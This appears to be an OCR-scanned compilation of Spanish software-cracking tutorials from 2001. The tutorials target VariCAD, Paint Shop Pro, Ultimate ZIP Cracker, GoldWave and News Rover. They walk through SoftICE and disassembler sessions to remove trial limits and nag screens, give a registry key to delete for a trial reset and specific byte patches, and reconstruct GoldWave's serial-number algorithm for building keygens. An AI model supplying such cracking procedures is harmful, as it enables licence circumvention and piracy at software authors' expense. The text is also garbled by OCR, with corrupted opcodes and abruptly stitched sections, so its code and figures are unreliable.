Un dato oculto. 


Sin embargo, falta algo... ¿De dónde sale la fecha que aparece en 78CE98?. 
Pomenos un BPM 78CE98 W para que SICE salte cuando alguien 'toque' allí, y 
volvemos a reiniciar el programa. Cuando salta el BP, FileMON acaba de 
registrar la apertura para lectura de un fichero: system.con. Es curioso. En 
las primeras observaciones del entorno, este fichero era de tipo plano, con 
todo 'al aire'. ¿Que oculta system.con? 


Lo abrimos una vez más con el notepad. Un montón de parámetros más o menos 
inteligibles... nada a primera vista. Hagamos suposiciones. Hubiera sido 
demasiado fácil que en el fichero hubiera aparecido la fecha en formato 
'dd-mm-yyyy hh-mm+ss'. Mmmh. Pero estos números... son siempre decimales. 
Mmmh. Veamos. Si transformamos la fecha desencriptada a decimal nos dá este 
número. búsquemoslo en el archivo. ¡BINGO!. La sección NURBS tiene como 
primer parámetro el mimsmo número que representa la fecha desencriptada. Es 
casí demasiado fácil. 


Una lectura atenta de FileMON nos descubre el misterio completo. Cuando 
nosotros tocabamos la fecha de 78CE98 desde el SICE el patch funcionaba 
porque ¡al finalizar el programa éste se encarga de salvar el system.con!. O 
sea, que si tocamos el .Ick y el system.con simultáneamente, podremos tener 
los días de prueba que queramos. 


No tan newby 


Faltaba hacer un programa que aplicara el parche. En mi empresa, lo que más 
usamos es VB6, así que me puse a ello y aquí está el resultado (adjunto). 

Uso del Parche 

El parche es muy sencillo de manejar, aunque no sea muy profesional. 

La idea, como explicaba en el tutorial, es variar el fichero .Ick del 

directorio Mlib, de manera que su desencriptado coincida con el parámetro 
NURBS del fichero system.con del directorio 1cfg (en el directorio de 

trabajo). 

Lo primero es instalar Varicad 7.3.0.4 (con la actual versión, la 8, aún no 

lo he probado, 


Karpoff Spanish Tutor 


Programa: Paint Shop Pro 7.02 y Animation Shop 3.02 


PROTECCION: Evaluación de 30 dias 
Descripcion: Límite de tiempo y nags-screen 
Dificultad: Aficionado 

DOWNLOAD : http://www. jJasc.com 


Hex WorkShop 2.20b005 
SoftICE 4.0 

KrackPE ( de nuMIT_or (KUT) ) 
KW32dasm 8.93 


CRACKER: Fantomas FECHA: 30/05/2001 
INTRODUCCION 


Antes que nada, voy a comentar que esta aplicacion siempre me ha parecido fabulosa desde sus primeras 
versiones, sin embargo hasta antes de la version 6.xx, era muy facil volver a tener otros 30 dias de 
evaluacion, simplemente borrabas del registro la entrada 
[HKEY_CLASSES_ROOTCLSID(10722D20-FD67-11CE-A6F7-444553540000 MiscStatus] 

y voila 'primer dia de evaluacion", aunque siempre te aparecia el Nag de inicio 


Herramientas: 


E 


Esta es la primer aplicacion que analizo, y fue despues de leer algunos tutoriales y ejemplos de 'Karpoff', en 
especial el de 'Paint Shop Pro 7.0 y Animation Shop 3.0', articulo de 'kamu1' del 20/02/2001 


Sucede que al tratar de seguirle los pasos a 'kamui' me tope conque la aplicacion era diferente, tal parecia que 
los de 'Jasc' tambien lo leyeron y corrieron a sacar la version 7.02, la cual ya es distinta 


AL ATAKE 


Iniciemos conociendo como se comporta la aplicacion mediante unas pruebas de rutina: 


- Corremos la aplicacion y mediante el aviso del menu 'Help', se nos hace de nuestro conocimiento el siguiente, 
mensage: "You are on day 16 of your 30 day evaluation period" 

- Salimos de la aplicacion 

- Adelantemos el reloj 10 dias 

- Corremos nuevamente la aplicacion y ahora vemos el siguiente mensage: "You are on day 26 of your 30 day 
evaluation period" 


Hasta aqui, podemos observar que la aplicacion utiliza la fecha del sistema para evaluar el uso del periodo de 
evaluacion (30 dias), y mostrar el resultado en el NAG inicial, asi que lo primero que haremos sera utilizar 'BPX 
GetSystemTime' 


Corremos el Loader32 del Softlce y cargamos la aplicacion, se habre el Softlce indicando un error al inicializar 
015F:0083332c INVALID 
continuamos con 'ES', desaparece Softlce por unos momentos y regresa en la siguiente direccion 


KERNEL32!GetSystemTime 
015F:BFFADAC6 SUB  EDX,EDX Oo Aqui estamos 
015F:BFFADAC8 PUSH BFFA18BC 
015F:BFFADACD PUSH DWORD PTR FS:[EDX] 
015F:BFFADADO MOV  FS:[EDX],ESP 
015F:BFFADAD3'— MOV  ECX, [ESP+0C] 
015F:BFFADAD7 ADD  BYTEPTR [ECX],00 
015F:BFFADADA ADD  BYTEPTR [ECX+0F],00 
015F:BFFAOADE 


seguimos corriendo la aplicacion con 'F5' esperando que aparesca el NAG y nada todavia, pero nuevamente volvemos 
a la direccion 


015F:BFFADAC6 SUB  EDX,EDX 


una vez mas 'ES' y ahora si tenemos enfrente el NAG ( presionando 'F4' para ver atras del Softlce ), continuamos y 
cerramos la aplicacion 


Corremos nuevamente el proceso anterior, pero ahora nos detenemos en la segunda interrupcion, dado que si 
presionamos 'F5S' nos aparece el NAG y queremos evitar eso, asi que presionamos 'F12' para ver quien hizo la llamada 


015F:780271E0 CALL  [KERNEL32!GetSystemTime] 


015F:780271E6 MOV  AX,[EBP-16] Ro Aqui estamos 
015F:780271EA CMP — — AX,[7803EFF2] 
015F:780271F1 


checamos con 'F4' y nada, todavia no apacere el NAG, asi que nuevamente va 'F12', que nos regresa a 


015F:005E0061 CALL  [00872A08] 

015F:005E0067 MOV  ECX,[ESP+1C] Ro Aqui estamos 
015F:005E006B MOV  EDX,[ESP+40] 

015F:005E006F PUSH ECX 

015F:005E0070 PUSH EDX 

015F:005E0071 CALL [00872AFC] 


checamos nuevamente con 'F4' y nada, todavia no apacere el NAG, asi que nuevamente va 'F12", que nos regresa a 


015F:0073609A CALL 005DFD10 


015F:0073609F PUSH 78 Oo Aqui estamos 
015F:007360A1 CALL  008318D8 

015F:007360A6 MOV  ESLEAX 

015F:007360A8 ADD — ESP,04 

015F:007360AB MOV  [ESP+0C],ESI 


checamos nuevamente con 'F4' y nada, nuevamente va 'F12', que nos regresa a 


015F:00621CF8 CALL  00735FEO 

015F:00621CFD ADD — ESP,04 rr Aqui estamos 
015F:00621D00 CALL  0083279C 

015F:00621D05 TEST  ESIESI 


checamos 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


ULTIMATE ZIP CRACKER 6.3 


Versión "demo" con todo deshabilitado. 

Conseguir un programa totalmente funcional. 

Para recuperar contraseñas perdidas. 

Principiante. 

http://www.home.ru/vdg/uzc.htm 

Softice 3.24, Exescope 6.0, W32Dasm 8.9, un editor hexadecimal. 

Arkanian FECHA: 20/06/2001 


INTRODUCCION 


"¿Perdiste la contraseña de uno de tus archivos comprimidos a través de ZIP ?. Con Ultimate ZIP Cracker 
podrás recuperar esas contraseñas perdidas sin gran esfuerzo. El programa es capaz de utilizar varios 
métodos de recuperación de contraseñas, como es el caso del método de fuerza bruta, a través de búsquedas 
en diccionarios, y a través de fechas de nacimiento. Además, podrás especificar el rango de longitud de la 
contraseña y el tipo de carácteres que contiene, y por supuesto seleccionar el método de búsqueda de la 
contraseña. Mejoras en la nueva versión: Nueva utilidad para recuperar contraseñas, soporta ZIP, ARJ, 
Word y Excel en todas sus versiones, mucho más veloz (especialmente trabajando con archivos ZIP), 
diccionario más amplio, etc. Limitaciones de la versión shareware: Sólo podrás ver las contraseñas a través 
del método de "Brutal Force Attack". 


Impresionante, ¿no?, pues es mentira. La limitación del programa es que solo muestra las contraseñas 
compuestas de uno, dos y tres caracteres. Para contraseñas de cuatro caracteres en adelante aparece una 
ventana del tipo "Contraseña encontrada. Si quieres verla, pasa por caja". 


Y es que no te puedes ya ni fiar de la publicidad. Publicidad engañosa se le llama a esto. 


Realmente se pueden usar cualquiera de los numerosos métodos de búsqueda que trae el programa, pero 
limitado a contraseñas de tres caracteres, para cuatro o más de cuatro ...ya sabes, opción "Purchase the full 


version”. 


Vamos a ver como hacerlo para "liberar" totalmente el programa y convertirlo en algo útil. 


Empezamos... 


AL ATAKE 


UNA PRUEBA PRELIMINAR 


Instalamos el programa, el Setup trae por defecto como User name "Trial version user” sin posibilidad de 
modificación, ...ya veremos. 


Lo ejecutamos y le decimos que si, que / Agree, en la ventana que nos recuerda lo pobres que somos. El programa se 
inicia con un enorme y antiestético "trial version '' como título de la ventana principal. 


Investigamos un poco y vemos que no hay otra opción de registro que la que nos manda a la página de esta gente. 
Humm ... en el About hay un par de campos tipo edit atenuados, podemos posicionar el cursor pero no los podemos 
modificar, ...de momento. 


Cogemos cualquier archivo, le metemos un "Add to zip", le ponemos una contraseña facil del tipo 1212 y probamos el 
programita de marras. En menos de 7 segundos obtenemos el siguente resultado: 


Detection process is done E 


Totalfiles: [Y 
Encrypted files: AN 
Passwords detected: E 
Passwords show: [o 


Some passwords detected were hot shown. This is a: 
trial version limitation. 

The full version of Ultimate ZIP Cracker always 
displays passwords detected, 

Please visit product's home page to purchase the ful 
version. 


Click View data' to view the begiring of the files to 
ensure that the passwords were really detected, 
Click 'Get password right now" to get your password 
anvwas. 


El Home page nos manda a la página de los creadores del programa, Get password right now! nos manda a un 
formulario de envio de correo, donde les mandamos el archivo cuya contraseña queremos averiguar como archivo 
adjunto, ellos averiguan la contraseña y nos la reenvian después de pasar por caja. También nos avisan que no valen 
correos anónimos tipo hotmail o similar, que astutos. 


Para más inri el botón View data muestra los cien primeros bytes del archivo para que veas que realmente ha 
encontrado la contraseña, realmente injurioso. 


PLANIFICACION 
Vamos a ver que nos cuenta el eXeScope. Rápidamente localizamos en Resource / Dialog la ventanas interesantes: 


e -. Resource / Dialog / 100 --> La ventana del About. 


-. Resource / Dialog / 107 --> Ventana del Setup donde trae por defecto el "Trial version user”. 
-. Resource / Dialog / 122 --> "Thank you for trying... '', la ventana de inicio del Í Agree. 

-. Resource / Dialog / 140 --> "Detection process is done”, ...curiosísimo. 

-. Resource / Dialog / 141 --> La ventana que muestro en la imagen de arriba. 


Muy interesante, tenemos dos diálogos con el mismo título, el 140 y el 141, "Detection process is done", uno es el de 
la versión shareware y el otro por sus caraterísticas tiene todas las pintas de ser el de la versión completa. Echadle un 
vistazo al diálogo 140 y comparadlo con el 141. 


«e Detection process is done ES 


Total files: | 
Encrypted files: | 
Passwords detected; | 


cm | 


¿Me equivoco?, creo que no... 


Parece que lo tenemos claro. Si planificamos la estrategia a seguir veremos que lo que hay que hacer es lo siguiente: 


e -. Modificar el nombre de usuario de forma que seamos nosotros y no el "Trial version user”. 
e -. Saltar por encima de la ventana del "Thank you for trying...”, shareware, etc... 
e -. Que cuando descubra una contraseña de cuatro o más caracteres vaya al diálogo 140 y no al 141. 
e -. Modificar el antiestético "trial version'' del título de la ventana del programa. 
VAMOS ALLA... 


Primer punto, el usuario de programa. 


Primero desinstalamos el programa y lo volvemos a instalar, ¿porqué?, pues por que la cosa funciona de la siguiente 
manera: 


El programa de instalación se llama Ultimate.exe y esta comprimido, cuando lo ejecutamos nos muestra la ventana del 
Setup y a la vez se descomprime en CAWindowsYTemp un archivo llamado UZC.exe que es el que realmente se 
encarga de la instalación. 


Es decir la ventana del Setup que aparece en pantalla NO es la misma que la del Resource / Dialog / 107. Para 
aclararnos estos son los diferentes archivos que intervienen: 


e -. Ultimate.exe --> El programa comprimido con su ventanita de Setup y que se descomprime en... 
e -. CAWindowsNTempWUZC.exe --> El programa real de instalación que nos instala .... 
e -. C:Mrchivos de programaNUZcWUzc.exe --> El ejecutable del programa. 


Lo que hay que hacer es modificar el contenido del User name de la ventana del Setup de Ultimate.exe, y esto lo 
hacemos con Softlce. 


Esperamos que aparezca la ventana del Setup, hacemos un Ctrl+D, vamos a Softlce y hacemos la busqueda: 


e. S 30:0 LEFFFFFFFFF "Trial version user''--> Buscamos... 
Pattern found at 30:509C8ED2 (8309 C8ED2) -- > Encontramos esto... 
S --> Por si acaso. 
Pattern found at 30:C0F39154 (C0F39154) --> El eco de la búsqueda. 


Modificamos en la Ventana de Datos, columna de ASCII, lo del Trial... por nuestro nombre, ARKANIAN. La cosa 
queda tal que, ARKANIA Nrsion user, para subsanar esto pulsamos el tabulador, nos vamos a la sección hex y 
machacamos los valores de rsion user con ceros. 


Una vez finalizada la instalación del programa, en la ventana About ya aparece nuestro nombre. Perfecto... 


Punto segundo, por encima del ''Thank you for trying...” 


Para este punto necesitaremos echar un vistazo al código de Uzc.exe con W32dasm. Encontramos esto en Dialog 
Information, al principio del código desensamblado. 


Name: DialogID_007A, + of Controls=010, Caption:"Ultimate ZIP Cracker" 
001 - ControlID:FFFF, Control Class:"" Control Text:"" 

002 - ControlID:FFFF, Control Class:”"" Control Text:"Thank you for trying 
003 - ControlID:FFFF, Control Class:"" Control Text:"" 

004 - ControlID:FFFF, Control Class:"" Control Text:"I understand that I 
005 - ControlID:0001, Control Class:”" Control Text:"8I Agree” 

006 - ControlID:03EC, Control Class:"" Control Text:"S Register” 

007 - ControlID:0002, Control Class:"" Control Text:"£Quit" 

008 - ControlID:FFFF, Control Class:"" Control Text:"Please note that th 
009 - ControlID:FFFF, Control Class:"" Control Text:"" 

010 - ControlID:FFFF, Control Class:”"" Control Text: "Unregistered version 


Se trata, evidentemente, de nuestra ventana que es identificada por el nombre de Dialog![D_007A. Para ir al código 
pulsamos DLG Ref en la barra de herramientas, localizamos el diálogo 7A y nos plantamos aquí: 


* Referenced by a CALL at Address: 
1:00414939 


:00403DF0 8B442404 mov eax, dword ptr [esp+04] 
:00403DF4 56 push esi 

:00403DES5 50 push eax 

:00403DF6 8BFl mov esi, ecx 


* Possible Reference to Dialog: DialoglID_007A --> La ventana dichosa. 


:00403DF8 6A7A push 0000007A --> Guarda el identificador. 

:00403DFA E857650200 call 00424356 --> Nos vamos a la ventana shareware. 
:00403DFF C706308D4300 mov dword ptr [esi], 00438D30 

:00403E05 8BC6 mov eax, esi 

:00403E07 SE pop esi 

:00403E08 C20400 ret 0004 


Hemos aterrizado aquí provenientes de una llamada en 00414939, así que, si vamos a esa dirección y buscamos hacia 
arriba, todos los saltos que encontremos y que nos permitan saltar por encima de esta dirección serán de lo más 


sospechoso. 


Estamos en 00414939, un poco más arriba encontramos unas referencias a unas comprobaciones en el registro: 


ADVAPI32.RegOpenKeyExA, Ord:0172h 
ADVAPI32.RegQueryValueExA, Ord:017Bh 
ADVAPI32.RegCloseKey, Ord:015Bh 


Pero no se trata de lo que estamos buscando ya que a continucion viene: 
* Possible StringData Ref from Data Obj ->"Ultimate ZIP Cracker was not succesfully... instalado" 


Parece que las referencias anteriores simplemente buscan si el programa esta instalado mediante una comprobación de 
las claves en el registro de Windows, sigamos un poco más arriba: 


:0041488E 8B442410 mov eax, dword ptr [esp+10] 


:00414892 64892500000000 mov dword ptr fs:[00000000], esp 
:00414899 81ECB8010000 sub esp, 000001B8 

:0041489F 3D34120000 cmp eax, 00001234 --> Que curioso. 
:004148A4 56 push esi 

:004148A5 57 push edi 

:004148A6 8BF1 mov esi, ecx 

:004148A8 0F8510010000 jne 004149BE -- 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


GOLDWAVE 4.21 


Serial Number. 

Desmontar el algoritmo de generación del Serial. 
Programa de edición de audio. 

Principiante. 


http://www.goldwave.com 
SoftlIce 3.24, papel y algo para escribir. 


Arkanian FECHA: 


INTRODUCCION 


25/03/2001 


Un impresionante programa de edición de audio que apenas ocupa 2 Mb con ayuda y todo. Lástima que este 
en ingles, bueno, algún fallo tenía que tener, el mundo no es perfecto. 


El Número de Serie válido correspondiente a los datos introducidos en la ventana de registro se genera a 
traves de un curioso algoritmo (si no sabes lo que es un algoritmo consulta un diccionario) que vamos a tratar 
de descifrar. Como resultado obtendremos un código valido para este programa y para todas las futuras 
versiones del mismo, o por lo menos así lo pone en la ayuda... 


No esperes encontrar aquí un Número de Serie válido sino el procedimiento y la forma en la que este se 


genera. 


No hacen falta grandes conocimientos matemáticos sino ganas de ejercitar las neuronas, un poco de atención, 
bajar al bar a por tabaco y dos elementos imprescindibles, papel en abundancia y algo para escribir. ¿Tienes 
de todo?, pues ya está. 


Empezamos... 


AL ATAKE 


VISTAZO PRELIMINAR 


Supongo que a estas alturas no hará falta que explique que bp's utilizar para saltar a Softlce. Pero bueno, en beneficio 
de los menos preparados de todos vosotros iremos (otra vez) paso a paso. Bien, después de ejecutar el programa vamos 
a la ventana de registro que se encuenta en Options / Register y que una vez rellenados todos los datos tiene este 
aspecto: 


Ela Name: [ARK 


Last Name: [ar KANIAN ono | 
Passiord He | 


Como se puede comprobar, tres cajas de edición, dos para el nombre y una para el Password, por cierto el Password 
que he metido y que está oculto por los asteriscos es 1234567890. 


Crtl+D, cambiamos a Softlce y aquí podemos optar por varios caminos: 


-. Una busqueda mediante al comando $ de, por ejemplo el Last Name, ARKANIAN en este caso, para 
ponerle un BPR [resultado busqueda] [resultado busqueda + N* de caracteres] RW. 

-. Utilizar el comando TASK para identificar la tarea que nos interesa (Goldwave*), seguir con un 
HWND GOLDWAVE para acabar poniendo un BMSG [valor del Window Handle del primer Edit] 
WM_GETTEXT. 

-. Directamente y solo por probar BPPX HMEMCPY. La experiencia siempre es un grado, ;-). 


Cualquiera de los tres metodos funciona perfectamente y nos permitirá saltar a Softlce después de pulsar el botón de 
OK. ¿Estamos?, ¿Si?, Pues vamos directamente al código que genera el Serial válido. 


EL CÓDIGO 
Después de trazar un rato, salir al código real del programa y seguir otro rato con F8 encontramos esto: 


:00461B40 OFBEOA movsx ecx, byte ptr [edx] -> Último carácter del First Name. 

:00461B43 03C8 add ecx, eax -> Suma al valor del carácter el [N* de caracteres - 1]. 

:00461B45 03D9 add ebx, ecx -> Lo suma a EBX que empieza de 0. 

:00461B47 4A dec edx -> Siguiente caracter. 

:00461B48 8BC8 mov ecx, eax -> ECX hace de contador. 

:00461B4A 83C0OFF add eax, FFFFFFFF -> Disminuye EAX y lo prepara para el siguiente carácter. 
:00461B4D 85C9 test ecx, ecx -> Comprobación del contador. 

:00461B4F 75EF jne 00461B40 -> Si no es 0 volvemos arriba. 


Hemos introducido ARK como First Name, teniendo en cuenta que la manipulación empieza con el último caracter y 
de ahí va hacia atras la siguiente tabla aclarará un poco las cosas: 


| POSICION [P] | | POSICION [P] | | CARACTER | | VALOR | o [P-1 | 1] | [P-1] [[VALOR+[P-1]| + [VALOR + [P-1] | 1] 


Un rato después y después de unas comprobaciones de la longitud de los datos introducidos, en la dirección :00461B72 


encontramos otro fragmento de código similar que manipula el Last Name, esta vez la suma se acumula en ESL, y la 
tabla correspondiente es: 


POSICION | POSICION [P] | | CARACTER | | VALOR | O [P-1] | 1] VALOR + [VALOR + [P-1] | 1] 


De momento claro hasta aquí ¿no?. Ha cogido los caracteres del Nombre y los ha manipulado hasta obtener dos 
valores que están en EBX =El y en ESI = 261. Veamos que hace con ellos, este es el código donde se efectua la 
manipulación: 


:00461B9B 03F8 add edi, eax -> Suma el Número de caracteres, First Name + Last Name, [3+8 = B]. 
:00461B9D 59 pop ecx -> Recupera ECX cuyo valor es 0. 

:00461B9E 8BC7 mov eax, edi -> La suma de los caracteres a EAX = B. 

:00461BA0 8BDO mov edx, eax -> Lo mueve a EDX y empieza el baile... 

:00461BA2 8B4508 mov eax, dword ptr [ebp+08] -> Con esto pone EAX a 0. 
:00461BA5 C1E204 shl edx, 04 -> Desplaza a la izquierda 4 bits. Valor de EDX = BO. 
:00461BA8 8D 1452 lea edx, dword ptr [edx+2*edx] -> Empiezan 

:00461BAB 8D1492 lea edx, dword ptr [edx+4*edx] -> las 

:00461BAE 8D1492 lea edx, dword ptr [edx+4*edx] -> operaciones 

:00461BB1 8D 1492 lea edx, dword ptr [edx+4*edx] -> matemáticas para 

:00461BB4 03DA add ebx, edx -> sumar el valor obtenido al valor del Fist Name [E1]. 
:00461BB6 8B55FC mov edx, dword ptr [ebp-04] -> Se pone EDX a 0. 

:00461BB9 8BCB mov ecx, ebx -> Movemos el resultado anterior a ECX. 

:00461BBB C1E104 shl ecx, 04 -> Desplaza de nuevo 4 bits a la izquierda. 

:00461BBE 8D0C49 lea ecx, dword ptr [ecx+2*ecx] -> Más 

:00461BC1 8D0C809 lea ecx, dword ptr [ecx+4*ecx] -> operaciones 

:00461BC4 8D0C89 lea ecx, dword ptr [ecx+4*ecx] -> matemáticas 

:00461BC7 8D0C809 lea ecx, dword ptr [ecx+4*ecx] -> para 

:00461BCA 03Fl1 add esi, ecx -> sumar el nuevo valor al valor del Last Name, [261]. 
:00461BCC 8BDE mov ebx, esi -> El resultado final a EBX 

:00461BCE 8D741032 lea esi, dword ptr [eax+edx+32] -> Una dirección que será usada luego. 
:00461BD2 85DB test ebx, ebx -> Chequeo de control. 

:00461BD4 7425 je 00461BFB -> No saltamos... 


Después de todo esto tenemos en EBX el valor 17AF16D1, ¿será este el Número buscado?, pues no, la cosa todavía 
sigue un poco más. Inmediatamente después del salto anterior siguen las operaciones matemáticas: 


:00461BD6 8BC3 mov eax, ebx -> El valor final obtenido, 17AF16D1, a EAX. 

:00461BD8 33D2 xor edx, edx -> Ponemos EDX a 0. 

:00461BDA B91A000000 mov ecx, 0000001A -> El divisor de la siguiente operación. 

:00461BDF F7Fl div ecx -> Divide EAX entre ECX, el cociente se queda en EAX y el resto va EDX. 
:00461BE1 80C241 add dl, 41-> Le suma 41 al resto y ya tenemos el primer caracter del Serial válido. 
:00461BE4 8BC3 mov eax, ebx -> Otra vez el valor final en EAX. 

:00461BE6 8816 mov byte ptr [esi], dl -> El caracter obtenido a la dirección donde se creará el Serial. 
:00461BE8 33D2 xor edx, edx -> Lo ponemos a 0 para la siguiente operación. 

:00461BEA B91A000000 mov ecx, 0000001A -> El divisor de nuevo. 

:00461BEF 46 inc esi -> Incrementa la dirección de EST para el siguiente caracter. 

:00461BF0 F7Fl div ecx -> Otra división. 

:00461BF2 FF45FC inc [ebp-04] -> Aquí aparece el contador de caracteres del Serial bueno. 
:00461BF5 89C3 mov ebx, eax -> Prepara EBX para la siguiente vuelta. 


:00461BF7 85DB test ebx, ebx -> Comprobación de control. 
:00461BF9 75DB jne 00461BD6 -> Volvemos arriba... 


Poniendo todo en claro para que nos enteremos, la cosa es más o menos así: 


ALGORITMO DE UN SERIAL VÁLIDO 


First Name: SUMA [Valor caracter + (Posición - 1)] = VALOR 1, (V1). 
Last Name: SUMA [Valor caracter + (Posición - 1)] = VALOR 2, (V2). (**) 


(*) No te rias, pero usando sólo valores numéricos como caracteres del Nombre puedes convertir una hoja 
de Excel en un Keygen. (Paja mental producto de una espectacular resaca). ¡Y funciona! 


N* Total de caracteres: N' carateres First Name + N' caracteres Last Name = X, 


Le añadimos un 0 a la derecha, nos queda X 0, entonces: 
[X0+ Q*X 0)]=A 

[A + (4%A)] = B 

[B + (4*B)] = C 

[C + (4*C)] = RESULTADO 1, (R1) 


Lo sumamos al valor del First Name: 
V1 + R1 = SUMA 1, (S1) 


¡A esta suma le añadimos otro cero a la derecha, (S1 0), y seguimos: 
[S1 0 + Q*S1 0)] =D 

[D + (4*D)] = F 

[E + (4*F)] = G 

[G + (4*G)] = RESULTADO 2, (R2) 


Le sumanos al valor correspondiente del Last Name: 
V2 + R2 = Valor obtenido del Nombre. 


Por último hacemos las divisiones teniendo en cuenta que solo el resto resultante de la 
secuencia impar de operaciones va a ser utilizado para generar el Número de Serie 
válido: </em 


Programa: 


Karpoff Spanish Tutor 


News Rover 6.2 rev. 3 


PROTECCION: Name / Serial 

Objetivo: Hacer un Keygen 

Descripcion: Gestiona mensajes de grupos de noticias O eso creo... 
Dificultad: Será fácil, pero a mí me ha costado lo suyo :o( 

DOWNLOAD: ftp://ftp118.pair.com/pub/sandh/nrsetup.exe 

Herramientas: Softice 

CRACKER: CaoS ReptantE FECHA: 14/05/2001 


INTRODUCCION 


Empiezo este tutorial como empezaba el gaucho Martín Fierro el relato de sus desdichas: 


"Aquí me pongo a cantar 
al compás de la vigiiela, 
que el hombre que lo desvela 
una pena estraordinaria, 
como la ave solitaria 
con el cantar se consuela." 


Y es que no se sabe si reír o llorar. Este programador es ponzoñoso. Creo que el crackear este programa ha 
acelerado el irreversible proceso de mi decrepitud... :o( 

Primero me encontré con la sorpresa de que los cambios efectuados por el Softlce EN LA MEMORIA, se 
guardan en el ejecutable, que queda alterado, conservando la fecha y hora originales. Sé que esto es difícil 
de creer, pero fácil de comprobar. Estos cambios, además, no sólo consisten en la modificación, por 
ejemplo, de un salto que hayamos podido hacer sobre la marcha, si no que, si hemos hecho un breakpoint a 
una dirección de la memoria, nos coloca CC en esa dirección del programa (no lo hace en caso de 
breakpoints que no se refieran a direcciones concretas como por ejemplo, hmemcpy o funciones similares). 
¿Por qué CC? Es la codificación de la instrucción INT3 que es la que utiliza el Softlce para detener la 
ejecución del programa "víctima". De aquí resulta que si miramos esa dirección del programa con un editor 
hexadecimal, vemos CC, pero si ejecutamos el programa, el Slce se detiene y no nos muestra CC, sino la 
instrucción que debería ir en ese lugar. A causa de estas manipulaciones, veremos como acaba apareciendo 
la famosa ventana que nos informa de que "Este programa ha efectuado una operación no...” y a la calle. 
Esto quiere decir que el sacar una copia de seguridad del ejecutable, que en otros casos es conveniente, 
aquí es imprescindible. 


Y luego está la lista negra. Sí, una lista negra en la que se incluyen más de un centenar de textos, entre 
nombres de crackers y textos susceptibles de ser utilizados en pruebas como "bla bla", "qwerty", 
"registered" etc. También ha pensado el programador en los castellanoparlantes y ha incluido "lo que sea". 
Que Dios le bendiga... :'o( 


Pero vamos a ver, ¿de verdad cree este hombre que merece la pena tomarse el trabajo de crear esa 
larguísima lista negra, cuando su flamante programa lo puede crackear un indocumentado como yo, 
cambiando ocho tristes bytes? En fin, si así se ha quedado a gusto, bien hecho está. De todos modos, no 
vamos a parchear el programa sino a hacer un generador de números de registro. De hecho, la única 
utilidad de la lista negra es que nos obliga a poner una advertencia en el keygen, previniendo al posible 
usuario de que éste puede fallar. 


Después del trabajo que me ha costado hacer el keygen, espero figurar en la lista negra de la próxima 
versión. Si no es así, tendré que ponerme en contacto con el infausto programador y decirle cuatro cosas 
bien dichas... :0D 


AL ATAKE 


El proceso que se sigue para la comprobación del número es básicamente el siguiente: Lo primero que hace, es pasar 
el número decimal introducido (de un mínimo de 9 cifras) a hexadecimal, lo descompone en dos números que divide 
por dos y por cuatro, hace una serie de permutaciones, operaciones XOR y finalmente compara cuatro cifras del 
número resultante con otras cuatro de un número obtenido a partir del nombre, ayudándose de una tabla que ya 
hemos visto en alguna otra ocasión. 


Vamos a intentar seguir este proceso de manera que se entienda. :0) 


En primer lugar, arrancamos el programa con el Softlce agazapado, y veremos una ventana en la que, con la excusa 
de darnos la bienvenida, nos pide que nos registremos. Así pues, introduciremos nuestros datos de registro, en este 
caso: Caos reptante como nombre y 305441741 como número. ¿Que es un número raro? ya veréis como no. Una vez 
introducidos los datos y antes de pulsar "Enter..." entramos en el Slce y ponemos la instrucción bpx 
getwindowtexta. A continuación, volvemos al programa y pulsamos "Enter..." El Slce se detiene. Damos una vez a 
FS para que lea la otra ventana, luego a F12 y caemos en este punto: 


* Reference To: USER32.GetWindowTextA, Ord:015Eh 


:00511325 FF1598765400 Call dword ptr [00547698] 
:0051132B EB12 jmp 0051133F 


Aquí trataremos de pillar al programa cuando lee nuestro nombre o número mediante las instrucciones s 30:00 1 
f£ffffff "Caos reptante' y s 30:00 1 ffffffff "305441741". Una vez sabemos donde guarda el programa nuestros datos, 
estableceremos los correspondientes breakpoints: bpm direccion_nombre rw y bpm direccion_numero rw. Damos a 
FS para continuar y nos detenemos en: 


:004584B9 F2 repnz 

:004584BA AE scasb 

:004584BB F7D1 not ecx 

:004584BD 49 dec ecx 

:004584BE 83F901 cmp ecx, 00000001 


Aquí comprueba que el nombre tenga al menos una letra :0) 


:004584C1 0F8278050000 jb 00458A3F 

:004584C7 8D7C2478 lea edi, dword ptr [esp+78] 
:004584CB 83C9FF or ecx, FEFFFFEF 

:004584CE F2 repnz 

:004584CF AE scasb 

:004584D0 F7D1 not ecx 

:004584D2 49 dec ecx 

:004584D3 83F909 cmp ecx, 00000009 


Y aquí, que el número tiene al menos nueve cifras. Si quisiéramos parchear el programa, substituiríamos el 09 por 01 
(primer byte). 


:004584D6 0F8263050000 Jb 00458A3F 


Este salto nos mandaría a freír espárragos. 
Seguimos adelante y llegamos a la rutina que convierte nuestro número en hexadecimal: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00458543(C) 

:0045851B OFBE0O6 movsx eax, byte ptr [esi]l 
:0045851E 50 push eax 


:00458541 3AC3 cmp al, bl 
:00458543 75D6 jne 0045851B 
:00458545 8B4C2410 mov ecx, dword ptr [esp+10] 


Una vez convertido nuestro número (ECX=1234ABCD) podéis ver que no era tan raro :0) 


:00458549 890DB44F5B00 mov dword ptr [005B4FB4], ecx 
:0045854F E89CA1FCEF call 004226F0 
:00458554 DC2530315B00 fsub qword ptr [005B3130] 


:0045858A 50 push eax 
:0045858B DDD8 fstp st (0) 
:0045858D E86EF6FFFF call 00457C00 


* Referenced by a CALL at Addresses: 
| :0040DB27 , :0042F53C , :00457B9E , :0045858D , :004D2EF3 


:00457C00 8B442408 mov eax, dword ptr [esp+08] EAX=1234ABCD 

:00457C04 8B4C2404 mov ecx, dword ptr [esp+04] ECX=83EB84, la 
dirección de 
nuestro nombre 

:00457C08 83EC0OC sub esp, 0000000C 

:00457C0B 53 push ebx 

:00457C0C 55 push ebp 

:00457C0D 56 push esi 

:00457C0E 57 push edi 

:00457C0F 50 push eax 

:00457C10 51 push ecx 

:00457C11 E83AF50700 call 004D7150 


En este call, se comprueba que se haya introducido un nombre (4D71A4), que dicho nombre no esté en la lista negra 
(4D71El1) y que se haya introducido un número distinto de O (4D71F4 y 4D71FD). Si quisiéramos parchear el 
programa, substituiríamos en la dirección 4D71E3 el salto 74 30 por 90 90 (segundo y tercer bytes). Ya estamos de 
vuelta: 


:00457C16 83C408 add esp, 00000008 

